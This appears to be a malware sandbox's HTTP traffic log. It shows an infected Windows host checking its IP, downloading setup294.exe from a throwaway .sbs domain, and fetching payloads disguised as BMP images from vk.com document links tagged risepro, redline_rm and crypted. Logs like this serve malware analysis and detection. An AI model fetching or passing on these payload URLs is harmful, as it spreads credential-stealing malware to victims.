Network Analysis

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: api.myip.com

HTTP/1.1 200 OK Date: Wed, 29 Nov 2023 06:51:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=p9NM3ZonNo5BgUuNKjNabyhTl0jwr%2FnxEjWvmrZE7A5usYQGKxyh%2BgkA%2FXdR6BPN%2BCMq%2FNFFV%2BSSjeWsDb7ZjVR4NacZhGvQa0vnJmMgUb2j4ZTNCry8TScc8clUyg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 82d8ec98ef1229e3-FUK

GET /doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache

HTTP/1.1 200 OK Server: kittenx Date: Wed, 29 Nov 2023 06:51:52 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 313636 Connection: keep-alive X-Powered-By: KPHP/7.4.115131 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixlang=17; expires=Tue, 03 Dec 2024 02:42:38 GMT; path=/; domain=.vk.com Set-Cookie: remixstlid=9091518799777550175_fZnnlV78yqpQGrkpcQBpLR19F3K2Z1SnEz8MKt7PvgT; expires=Thu, 28 Nov 2024 06:51:52 GMT; path=/; domain=.vk.com; secure Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Set-Cookie: remixlgck=42a3a24825ddd8dded; expires=Mon, 02 Dec 2024 00:57:50 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstid=1332058940_Ev7HuUMm98nGZ7hrCyHDUqvwUaFLK5nFaPfLmQuxEQX; expires=Thu, 21 Nov 2024 07:04:23 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend X-Trace-Id: hxo6Vn0QgZlElF24jKx1yOGWpIApQQ

GET /setup294.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: thezccasdsadasdafdsdfdgfdfdfhdfhagdfahfsgh.sbs Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 29 Nov 2023 06:51:58 GMT Content-Type: application/x-msdos-program Content-Length: 1939585 Connection: keep-alive Last-Modified: Wed, 29 Nov 2023 05:36:04 GMT ETag: "1d9881-60b43e93bf900" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 3151 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2Jcn7JMre1T04GOH5UDq4pczMR0fj4UlMX%2Fy5OwW1tbd0HmSNO18alS7sLj0iE9ejTbY%2BMTeJ%2FjLuDU6FB8pBv9PkYg1SirWsR6SBjVB%2Be%2FTqPYnSi2dRzrQCb0viYVcy4Y4n0yE9a2TuSFmvkYcZbLrHUNbOdOHxQ8abETJ37b8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 82d8ecd7dd907c3b-LAX alt-svc: h3=":443"; ma=86400

GET /doc418490229_668929938?hash=ktCgmKYqoZFe4ivRZzzbNBxLkP2YROgRTvMCbGK5rtc&dl=Q00m1ouR7KqanosInfovEoKZoXQN3pn1V9bUiGxjkk0&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9091518799777550175_fZnnlV78yqpQGrkpcQBpLR19F3K2Z1SnEz8MKt7PvgT; remixlgck=42a3a24825ddd8dded; remixstid=1332058940_Ev7HuUMm98nGZ7hrCyHDUqvwUaFLK5nFaPfLmQuxEQX

HTTP/1.1 302 Found Server: kittenx Date: Wed, 29 Nov 2023 06:51:59 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.115131 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-23.userapi.com/c909328/u418490229/docs/d4/513c59e462a3/2s78sh2agf.bmp?extra=wo3J3uOiHbgaAFfUUpBiWNnQ_wa3RVUVpf16WebNgU3tW18tv009ULs2b4b8x5HTDD7XJTCRwRbunl6DgE_pXd2Bpht21e04pZ2mEDxtRrUOB_l46TDy9w7D_F8mVOCDwNW_T0c_ZlIZ8-Hh2A X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend X-Trace-Id: CmkfbeclCeE9bYHYLzkagEyBMU1nnw

GET /c909328/u418490229/docs/d4/513c59e462a3/2s78sh2agf.bmp?extra=wo3J3uOiHbgaAFfUUpBiWNnQ_wa3RVUVpf16WebNgU3tW18tv009ULs2b4b8x5HTDD7XJTCRwRbunl6DgE_pXd2Bpht21e04pZ2mEDxtRrUOB_l46TDy9w7D_F8mVOCDwNW_T0c_ZlIZ8-Hh2A HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-23.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Wed, 29 Nov 2023 06:52:00 GMT Content-Type: image/x-ms-bmp Content-Length: 351236 Connection: keep-alive Last-Modified: Tue, 28 Nov 2023 10:51:25 GMT ETag: "6565c62d-55c04" Expires: Fri, 29 Dec 2023 06:52:00 GMT Cache-Control: max-age=2592000 X-Frontend: front6-23 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /doc278414724_666785048?hash=BEECsUI0KihIsE0U0nCflKTI5jGLqnjbHrZ921hHoIo&dl=MlH2hFcAGSgijzPzzjYVJFJFj9WHHsyc0XO9FI0mX38&api=1&no_preview=1#ww11 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9091518799777550175_fZnnlV78yqpQGrkpcQBpLR19F3K2Z1SnEz8MKt7PvgT; remixlgck=42a3a24825ddd8dded; remixstid=1332058940_Ev7HuUMm98nGZ7hrCyHDUqvwUaFLK5nFaPfLmQuxEQX; remixir=1

HTTP/1.1 200 OK Server: kittenx Date: Wed, 29 Nov 2023 06:52:02 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 313583 Connection: keep-alive X-Powered-By: KPHP/7.4.115131 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline' X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend X-Trace-Id: oITmHHgaNBULSAh7tzI7lrCRLG3UrA

GET /doc418490229_668767729?hash=65wAhIT5Td9Qu0SLdsQyFz8gx9sXRgxbSsg6rImiJQH&dl=ur2wv4vg3UjVwTO0wSnjKdxULtRETYEfElriZjtBG64&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9091518799777550175_fZnnlV78yqpQGrkpcQBpLR19F3K2Z1SnEz8MKt7PvgT; remixlgck=42a3a24825ddd8dded; remixstid=1332058940_Ev7HuUMm98nGZ7hrCyHDUqvwUaFLK5nFaPfLmQuxEQX; remixir=1

HTTP/1.1 302 Found Server: kittenx Date: Wed, 29 Nov 2023 06:52:02 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.115131 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-21.userapi.com/c237331/u418490229/docs/d28/adfc4032e372/BotClients.bmp?extra=u6VcUNDBHlz4YtdAG5FSiCZtBVvB20an469YZyM8KYXq3Vh2UQ8YRDjgubImLSU5YyYT8TRfRocazjx4RVqpRtmvXLm18R9BiDOzCavVrvZPK5TXT1v1nS1lYeEizYUGJUOVTFeMRkJhvuR3lQ X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend X-Trace-Id: w5yxUTpujO5ckJWM_fURbOv6_gfRwg

GET /c237331/u418490229/docs/d28/adfc4032e372/BotClients.bmp?extra=u6VcUNDBHlz4YtdAG5FSiCZtBVvB20an469YZyM8KYXq3Vh2UQ8YRDjgubImLSU5YyYT8TRfRocazjx4RVqpRtmvXLm18R9BiDOzCavVrvZPK5TXT1v1nS1lYeEizYUGJUOVTFeMRkJhvuR3lQ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-21.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Wed, 29 Nov 2023 06:52:04 GMT Content-Type: image/x-ms-bmp Content-Length: 2159124 Connection: keep-alive Last-Modified: Fri, 24 Nov 2023 09:31:24 GMT ETag: "65606d6c-20f214" Expires: Fri, 29 Dec 2023 06:52:04 GMT Cache-Control: max-age=2592000 X-Frontend: front6-21 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /doc418490229_668931401?hash=iAFqqX4VsjibbUrFFs3uLnWGAIedldaHRjTySVZmqV0&dl=hZ7Ql2epmfz2WiO8BxGI8cdwo6AK6bLFPyI65FMR3FH&api=1&no_preview=1#maff HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9091518799777550175_fZnnlV78yqpQGrkpcQBpLR19F3K2Z1SnEz8MKt7PvgT; remixlgck=42a3a24825ddd8dded; remixstid=1332058940_Ev7HuUMm98nGZ7hrCyHDUqvwUaFLK5nFaPfLmQuxEQX

HTTP/1.1 302 Found Server: kittenx Date: Wed, 29 Nov 2023 06:52:08 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.115131 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-23.userapi.com/c909328/u418490229/docs/d20/f3a7ad2143af/mr_Bro.bmp?extra=LeAgMHn_2s_EVvaW-K_cYV6O9innY-2Ivke0GMPWzt-Bxu8pOVe7OUztp54ANXLikgsNht2ZvFU3mutgl9UWPZP25IvV6FHhjqfrAX2L6bAqCC7SyALVe6WD2lVYAeSAh3Vn80bmEFxY13YjhQ X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend X-Trace-Id: dDZoLgoJCBWcH0dHB-mI2xzjKhp-RQ

GET /doc418490229_668929813?hash=CcrmLI7IeiRz0lU8DnAVrRG7zp1VmDOzkljV4YdvlFg&dl=fbXhUnfoCiOFBNTYzP3G4TgseWVmer9dhybO06Dbf3X&api=1&no_preview=1#risepro HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9091518799777550175_fZnnlV78yqpQGrkpcQBpLR19F3K2Z1SnEz8MKt7PvgT; remixlgck=42a3a24825ddd8dded; remixstid=1332058940_Ev7HuUMm98nGZ7hrCyHDUqvwUaFLK5nFaPfLmQuxEQX

HTTP/1.1 302 Found Server: kittenx Date: Wed, 29 Nov 2023 06:52:08 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.115131 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-22.userapi.com/c236331/u418490229/docs/d5/af51deff0236/Rise.bmp?extra=EXpRRrsiC1jWoHBXbvHHi-UWj6Grj_AkUV6kOcM6llnGcexjn5FNP-bw5dsGphz9RLFdXu9yhqgky3xkYW4oblIQTqffvix3MCOTMskXb-0k6HOQ4MwchfLG5QMetCJb-25Uj9rO2AF0wV3bkQ X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend X-Trace-Id: XFSw1kafQpqmY5PZvE-JlPnpt9VRiQ

GET /c909328/u418490229/docs/d20/f3a7ad2143af/mr_Bro.bmp?extra=LeAgMHn_2s_EVvaW-K_cYV6O9innY-2Ivke0GMPWzt-Bxu8pOVe7OUztp54ANXLikgsNht2ZvFU3mutgl9UWPZP25IvV6FHhjqfrAX2L6bAqCC7SyALVe6WD2lVYAeSAh3Vn80bmEFxY13YjhQ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-23.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Wed, 29 Nov 2023 06:52:08 GMT Content-Type: image/x-ms-bmp Content-Length: 4265484 Connection: keep-alive Last-Modified: Tue, 28 Nov 2023 11:26:23 GMT ETag: "6565ce5f-41160c" Expires: Fri, 29 Dec 2023 06:52:08 GMT Cache-Control: max-age=2592000 X-Frontend: front6-23 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /c236331/u418490229/docs/d5/af51deff0236/Rise.bmp?extra=EXpRRrsiC1jWoHBXbvHHi-UWj6Grj_AkUV6kOcM6llnGcexjn5FNP-bw5dsGphz9RLFdXu9yhqgky3xkYW4oblIQTqffvix3MCOTMskXb-0k6HOQ4MwchfLG5QMetCJb-25Uj9rO2AF0wV3bkQ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-22.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Wed, 29 Nov 2023 06:52:09 GMT Content-Type: image/x-ms-bmp Content-Length: 5541532 Connection: keep-alive Last-Modified: Tue, 28 Nov 2023 10:48:37 GMT ETag: "6565c585-548e9c" Expires: Fri, 29 Dec 2023 06:52:09 GMT Cache-Control: max-age=2592000 X-Frontend: front6-22 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /doc791620691_663065029?hash=Efubo9FQtw3Bdj42XJVcJwymfIH3PazMKz8g5wJ0dZX&dl=G44TCNRSGA3DSMI:1682787066:QgrgzF33wDt9bwmmOgWCYTv61J7HwhLVZOXGaEdWiKP&api=1&no_preview=1#test HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9091518799777550175_fZnnlV78yqpQGrkpcQBpLR19F3K2Z1SnEz8MKt7PvgT; remixlgck=42a3a24825ddd8dded; remixstid=1332058940_Ev7HuUMm98nGZ7hrCyHDUqvwUaFLK5nFaPfLmQuxEQX

HTTP/1.1 200 OK Server: kittenx Date: Wed, 29 Nov 2023 06:52:12 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 313651 Connection: keep-alive X-Powered-By: KPHP/7.4.115131 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend X-Trace-Id: nNKm65OAx9I1ES1FNX-VLFkYli028A

GET /doc418490229_668929802?hash=JGJzKUDsQctWofQ698XiG5TtXyL4jHXW5WO9kYCx09g&dl=jnJZekjN4zWOrABguUPz6zoyi3nglzHT0X5thDnbzMX&api=1&no_preview=1#redline_rm HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9091518799777550175_fZnnlV78yqpQGrkpcQBpLR19F3K2Z1SnEz8MKt7PvgT; remixlgck=42a3a24825ddd8dded; remixstid=1332058940_Ev7HuUMm98nGZ7hrCyHDUqvwUaFLK5nFaPfLmQuxEQX; remixir=1

HTTP/1.1 302 Found Server: kittenx Date: Wed, 29 Nov 2023 06:52:13 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.115131 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-20.userapi.com/c909518/u418490229/docs/d51/4406a2506340/red_line.bmp?extra=1GONfT_9cHm8rJzJ70PLJj4VAC91m0S4Gca-QG052TIJ_-UwtxALkVaPJ0uZ1FKVXet0kJLaXAZ51JpjRgVz_JEdKGwQ8dO7nEJ5B0ilU4MZvTvhmkRuXRNbW12qcvV2G5xp2F3bcuW3WdIAhQ X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend X-Trace-Id: mCXWVYDwyrUNiz-l500DqPws7P31yg

GET /doc418490229_668938366?hash=5FoUaQok0B2gtiDqcFJ4bpegTD2SPzTjKqykfkwb3zc&dl=vyAqT5Xe4xXyZ38CTECObVL4GlrQZGRjeNMqsV10szg&api=1&no_preview=1#1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9091518799777550175_fZnnlV78yqpQGrkpcQBpLR19F3K2Z1SnEz8MKt7PvgT; remixlgck=42a3a24825ddd8dded; remixstid=1332058940_Ev7HuUMm98nGZ7hrCyHDUqvwUaFLK5nFaPfLmQuxEQX; remixir=1

HTTP/1.1 302 Found Server: kittenx Date: Wed, 29 Nov 2023 06:52:15 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.115131 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-21.userapi.com/c909328/u418490229/docs/d52/e20150ec5011/crypted.bmp?extra=9_uUHyTbLcXEPVRQVoDX2SVXXD5LQIa5cbmPsUZ3sANv_Z7qrNnfAbxOeHfG8kJovBnfxWwX2ooHmOeZbCi822CJMQagWtI1l_OJm3U24MjBdIRMy5fjt-zQyydy6dHJmDi4Osx0CqpLJikI0A X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend X-Trace-Id: 5xP05sdY985XzzQTSlpgCDUhwPWlYQ

GET /doc26060933_667508201?hash=6VnuemqrvgMX7JGCKhOp7uAllSfIKzasrs7cM1fWhgL&dl=JwY775FVXYxbFspXlbElezWDzeVHhbpuZXgjGmHUTZs&api=1&no_preview=1#setup HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9091518799777550175_fZnnlV78yqpQGrkpcQBpLR19F3K2Z1SnEz8MKt7PvgT; remixlgck=42a3a24825ddd8dded; remixstid=1332058940_Ev7HuUMm98nGZ7hrCyHDUqvwUaFLK5nFaPfLmQuxEQX

HTTP/1.1 200 OK Server: kittenx Date: Wed, 29 Nov 2023 06:52:15 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 313584 Connection: keep-alive X-Powered-By: KPHP/7.4.115131 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend X-Trace-Id: mnCf8qwzawBcmSF94Mfr8efcbfhoww

GET /c909518/u418490229/docs/d51/4406a2506340/red_line.bmp?extra=1GONfT_9cHm8rJzJ70PLJj4VAC91m0S4Gca-QG052TIJ_-UwtxALkVaPJ0uZ1FKVXet0kJLaXAZ51JpjRgVz_JEdKGwQ8dO7nEJ5B0ilU4MZvTvhmkRuXRNbW12qcvV2G5xp2F3bcuW3WdIAhQ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-20.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Wed, 29 Nov 2023 06:52:15 GMT Content-Type: image/x-ms-bmp Content-Length: 2967644 Connection: keep-alive Last-Modified: Tue, 28 Nov 2023 10:48:28 GMT ETag: "6565c57c-2d485c" Expires: Fri, 29 Dec 2023 06:52:15 GMT Cache-Control: max-age=2592000 X-Frontend: front6-20 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

